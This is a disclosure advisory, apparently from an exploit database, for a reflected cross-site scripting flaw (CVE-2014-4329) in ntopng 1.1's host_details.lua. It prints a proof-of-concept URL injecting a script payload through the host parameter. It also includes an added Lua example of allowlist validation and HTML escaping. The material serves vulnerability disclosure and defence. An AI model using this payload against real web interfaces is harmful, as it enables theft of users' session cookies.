Ntop-NG version 1.1 suffers from a reflected cross-site scripting vulnerability.
c63a9f01cd4e6e39a33d31769307ba8f6ac0d9482ef45a69dbe6a335dc921fcd
# Exploit Title: Cross Site Scripting Vulnerability in Ntop-NG (CVE-2014-4329)
# CVE : CVE-2014-4329
# Date: 2 July 2014
# Exploit Author: Madhu Akula
# Vendor Homepage: http://www.ntop.org/
# Software Link: http://www.ntop.org/get-started/download/
# Version : Ntopng 1.1
# Severity: High
# Tested on: Ubuntu & Windows
# URL:
http://[domain]:3000/lua/host_details.lua?host=<script>alert(document.cookie)</script>
# Issue Details :
Ntopng is vulnerable to cross-site scripting, caused by improper
validation of user-supplied input by the host_details.lua script. A
remote attacker could exploit this vulnerability using the host
parameter in a specially-crafted URL to execute script in a victim's Web
browser within the security context of the hosting Web site, once the
URL is clicked. An attacker could use this vulnerability to steal the
victim's cookie-based authentication credentials.
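The input handling this issue calls for, shown as an added example that is not part of the original advisory and is not ntopng's own code: the host value is checked against an allowlist of address and hostname shapes, then HTML-encoded before it is written into the page. The function names, the accepted formats and the sample inputs are assumptions made for illustration.

```lua
-- Added example, not ntopng source. Names and accepted formats are assumptions.

-- Characters that let text break out of HTML element or attribute context.
local HTML_ENTITIES = {
  ["&"] = "&amp;", ["<"] = "&lt;", [">"] = "&gt;",
  ['"'] = "&quot;", ["'"] = "&#39;",
}

local function html_escape(value)
  return (tostring(value):gsub("[&<>\"']", HTML_ENTITIES))
end

-- Allowlist check: accept only strings shaped like an IPv4 address, an IPv6
-- address or a DNS hostname. Anything else is rejected before rendering.
local function is_valid_host(value)
  if type(value) ~= "string" or #value == 0 or #value > 253 then
    return false
  end
  -- IPv4: four decimal octets, each in the range 0-255
  local a, b, c, d = value:match("^(%d+)%.(%d+)%.(%d+)%.(%d+)$")
  if a then
    for _, octet in ipairs({a, b, c, d}) do
      if #octet > 3 or tonumber(octet) > 255 then return false end
    end
    return true
  end
  -- IPv6 (loose shape check): hex digits and colons only, at least two colons
  if value:match("^[%x:]+$") and select(2, value:gsub(":", "")) >= 2 then
    return true
  end
  -- Hostname: letters, digits, hyphen, dot; starts and ends alphanumeric
  return value:match("^%w[%w%.%-]*%w$") ~= nil or value:match("^%w$") ~= nil
end

-- Hypothetical handler: builds the HTML fragment that echoes the host value.
local function render_host_header(host_param)
  if not is_valid_host(host_param) then
    return "<p>Invalid host parameter</p>"
  end
  return "<h2>Host: " .. html_escape(host_param) .. "</h2>"
end

-- Constructed inputs: a legitimate value and the payload shape from this advisory.
for _, input in ipairs({"192.168.1.10", "<script>alert(document.cookie)</script>"}) do
  print(render_host_header(input))
end
```

Validation and encoding are applied together on purpose: the allowlist rejects malformed input early, and the encoding still protects the page if the allowlist is later loosened.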
# Steps to replicate: (POC)
1. Replace [domain] with the host and send the URL to the victim, or open it directly:
http://[domain]:3000/lua/host_details.lua?host=<script>alert(document.cookie)</script>
I have also attached a screenshot for the POC.
# References :
http://www.securityfocus.com/bid/66456
https://svn.ntop.org/bugzilla/show_bug.cgi?id=379
http://xforce.iss.net/xforce/xfdb/92135
http://cve.circl.lu/cve/CVE-2014-4329
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4329
http://cxsecurity.com/cveshow/CVE-2014-4329/
http://www.secuobs.com/revue/news/519877.shtml
Madhu Akula
Information Security Researcher
https://www.twitter.com/madhuakula